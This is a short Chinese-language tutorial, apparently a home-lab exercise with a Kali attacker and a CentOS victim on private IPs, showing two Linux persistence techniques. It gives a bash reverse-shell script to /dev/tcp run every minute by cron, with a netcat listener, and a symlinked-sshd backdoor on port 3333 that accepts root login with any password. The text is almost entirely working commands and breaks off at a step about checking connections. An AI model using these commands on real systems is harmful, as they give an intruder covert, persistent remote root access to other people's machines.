通過任務計劃反彈shell
環境:
kali攻擊機ip:192.168.10.128
centos受害機:192.168.10.129
centos:
1.編寫腳本evil.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.10.128/3333 0>&1
2.編輯任務計劃表
#給腳本賦予執行權限
chmod 755 evil.sh
#編寫任務計劃
crontab -e
#計劃任務內容,每分鐘執行一次
*/1 * * * * /root/evil.sh
#重新啓動計劃任務
service crond restart
kali
1.開啓監聽
#開啓監聽3333端口
nc -lvp 3333
2.獲取到centos的反彈shell
軟鏈接後門
centos
#建立後門軟鏈接
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=3333
軟鏈接建立後,任何一臺主機使用命令ssh root@IP -p 3333 任意密碼就能成功登陸,這裏使用kali嘗試,隨意輸入密碼,成功登陸。
centos查看一下端口連接: